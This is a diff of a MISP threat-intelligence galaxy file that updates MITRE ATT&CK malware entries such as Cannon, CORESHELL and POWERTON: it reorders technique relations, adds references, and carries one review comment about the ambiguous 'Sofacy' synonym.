"meta": { + "external_id": "S0355", + 
"mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0355", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ], + "synonyms": [ + "Final1stspy" + ] + }, + "related": [ + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "a2282af0-f9dd-4373-9b92-eaf9e11e0c71", + "value": "Final1stspy - S0355" + }, + { + "description": "[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. 
(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)", + "meta": { + "external_id": "S0351", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0351", + "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", + "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" + ], + "synonyms": [ + "Cannon" + ] + }, + "related": [ + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "d20b397a-ea47-48a9-b503-2e2a3551e11d", + "value": "Cannon - S0351" }, { "description": "[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)", @@ -14386,14 +16583,14 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -14406,6 +16603,55 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -14413,6 +16659,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ 
@@ -14427,41 +16680,6 @@ ], "type": "uses" }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -14470,28 +16688,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14505,7 +16702,7 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -14548,34 +16745,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -14583,34 +16752,6 @@ ], "type": "uses" }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ @@ -14626,7 +16767,14 @@ "type": "uses" }, { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -14638,6 +16786,55 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", @@ -14680,13 +16877,6 @@ ], "type": "uses" }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ 
@@ -14700,13 +16890,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "234e7770-99b0-4f65-b983-d3230f76a60b", "value": "Janicab - S0163" }, { - "description": "[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL. It has also been referred to as Sofacy, though that term has been used widely to refer to both the group [APT28](https://attack.mitre.org/groups/G0007) and malware families associated with the group. (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)", + "description": "[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)", "meta": { "external_id": "S0137", "mitre_platforms": [ @@ -14715,10 +16912,12 @@ "refs": [ "https://attack.mitre.org/software/S0137", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", - "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" ], "synonyms": [ "CORESHELL", + "Sofacy", "SOURFACE" ] }, 
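Review bot: The `synonyms` list in the `@@ -14715` hunk gains `"Sofacy"`, while the sentence explaining that this name is also widely used for the APT28 group itself is dropped from the description in the `@@ -14700` hunk just above it. Galaxy synonyms are typically what tagging and search match on, so after this change a mention of Sofacy meaning the group will presumably also resolve to the S0137 downloader, and the entry no longer says why that name is ambiguous. If the alias is carried over from upstream ATT&CK it should stay for fidelity, but the disambiguation should be kept where a consumer will see it, for instance by having the generator append `Note: "Sofacy" is also used as a name for the APT28 group.` to the description when the upstream text omits it.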
@@ -14744,6 +16943,20 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -14759,7 +16972,7 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14773,21 +16986,7 @@ "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -14838,6 +17037,75 @@ "uuid": "0e18b800-906c-4e44-a143-b11c72b3448b", "value": "FLIPSIDE - S0173" }, + { + "description": "[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)", + "meta": { + "external_id": "S0371", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0371", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + ], + "synonyms": [ + "POWERTON" + ] + }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": 
"e85cae1a-bce3-4ac4-b36b-b00acac0567b", + "value": "POWERTON - S0371" + }, { "description": "[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)", "meta": { @@ -14862,14 +17130,14 @@ "type": "uses" }, { - "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14919,14 +17187,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -14952,6 +17220,13 @@ ] }, "related": [ + { + "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ @@ -14966,13 +17241,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ 
@@ -15041,55 +17309,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 
@@ -15097,34 +17316,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ 
@@ -15132,12 +17323,96 @@ ], "type": "uses" }, + { + "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + 
}, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "00c3bfcb-99bd-4767-8c03-b08f585f5c8a", @@ -15194,14 +17469,14 @@ "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15214,6 +17489,13 @@ ], "type": "uses" }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -15221,13 +17503,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -15235,20 +17510,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ 
@@ -15262,6 +17523,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "dc5d1a33-62aa-4a0c-aa8c-589b87beb11e", @@ -15314,7 +17589,14 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15335,14 +17617,7 @@ "type": "uses" }, { - "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15446,13 +17721,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -15466,6 +17734,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", 
@@ -15501,20 +17776,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -15530,7 +17791,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15543,13 +17811,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -15570,6 +17831,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5f9f7648-04ba-4a9f-bb4c-2a13e74572bd", 
